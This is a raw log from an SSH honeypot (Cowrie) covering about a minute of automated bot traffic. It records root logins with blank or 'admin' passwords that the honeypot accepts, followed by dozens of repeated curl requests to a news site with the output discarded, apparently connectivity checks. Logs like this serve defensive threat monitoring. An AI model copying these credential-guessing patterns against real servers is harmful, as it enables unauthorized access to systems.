{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38048,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ba9aa2ac475","protocol":"ssh","message":"New connection: 212.227.125.160:38048 (1.2.3.4:22) [session: 4ba9aa2ac475]","sensor":"my-vps","timestamp":"2025-09-09T08:28:29.889878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:28:29.890811Z","src_ip":"212.227.125.160","session":"4ba9aa2ac475"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T08:28:30.173568Z","src_ip":"212.227.125.160","session":"4ba9aa2ac475"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:28:31.017658Z","src_ip":"212.227.125.160","session":"4ba9aa2ac475"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:28:31.377857Z","src_ip":"212.227.125.160","session":"4ba9aa2ac475"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52728,"dst_ip":"1.2.3.4","dst_port":22,"session":"18e1d8f8e8fb","protocol":"ssh","message":"New connection: 217.72.205.35:52728 (1.2.3.4:22) [session: 18e1d8f8e8fb]","sensor":"my-vps","timestamp":"2025-09-09T08:28:47.235552Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:28:47.236829Z","src_ip":"217.72.205.35","session":"18e1d8f8e8fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39160,"dst_ip":"1.2.3.4","dst_port":22,"session":"c843cc148950","protocol":"ssh","message":"New connection: 212.227.235.229:39160 (1.2.3.4:22) [session: c843cc148950]","sensor":"my-vps","timestamp":"2025-09-09T08:28:59.031137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:28:59.032040Z","src_ip":"212.227.235.229","session":"c843cc148950"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T08:28:59.375295Z","src_ip":"212.227.235.229","session":"c843cc148950"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:29:00.814500Z","src_ip":"212.227.235.229","session":"c843cc148950"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:29:01.133320Z","src_ip":"212.227.235.229","session":"c843cc148950"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51062,"dst_ip":"1.2.3.4","dst_port":22,"session":"7541ed730449","protocol":"ssh","message":"New connection: 212.227.125.160:51062 (1.2.3.4:22) [session: 7541ed730449]","sensor":"my-vps","timestamp":"2025-09-09T08:29:16.279621Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51072,"dst_ip":"1.2.3.4","dst_port":22,"session":"10e67a7b7d1a","protocol":"ssh","message":"New connection: 212.227.125.160:51072 (1.2.3.4:22) [session: 10e67a7b7d1a]","sensor":"my-vps","timestamp":"2025-09-09T08:29:16.282113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.8","message":"Remote SSH version: SSH-2.0-libssh_0.9.8","sensor":"my-vps","timestamp":"2025-09-09T08:29:16.283045Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.8","message":"Remote SSH version: SSH-2.0-libssh_0.9.8","sensor":"my-vps","timestamp":"2025-09-09T08:29:16.284102Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.client.kex","hassh":"3335afa7a75e84f8348f05c623c5ecf9","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 3335afa7a75e84f8348f05c623c5ecf9","sensor":"my-vps","timestamp":"2025-09-09T08:29:16.366741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.client.kex","hassh":"3335afa7a75e84f8348f05c623c5ecf9","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 3335afa7a75e84f8348f05c623c5ecf9","sensor":"my-vps","timestamp":"2025-09-09T08:29:16.381315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:29:16.681286Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:17.425126Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:17.425876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:17.486905Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:17.487781Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:17.615488Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:17.616201Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:17.757603Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:17.758616Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:17.821357Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:17.822097Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:17.959484Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:17.960307Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.032870Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.033794Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.206512Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.207065Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.273565Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.274585Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.492425Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.493314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.535935Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.536598Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.578064Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.578976Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.621989Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.622941Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.661211Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.661828Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.706382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.707429Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.747141Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.747928Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.787481Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.788438Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.825551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.826241Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.830357Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.865342Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.866145Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.907338Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.908082Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.938310Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.940926Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:18.983019Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:18.983794Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.011386Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.031251Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.077814Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.078604Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.115829Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.116811Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.154875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.155727Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.196645Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.197529Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.215006Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.239921Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.240726Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.244776Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.268913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.269742Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.493285Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.494007Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.497095Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.501995Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.503996Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.504718Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.547796Z","src_ip":"212.227.125.160","session":"7541ed730449"}
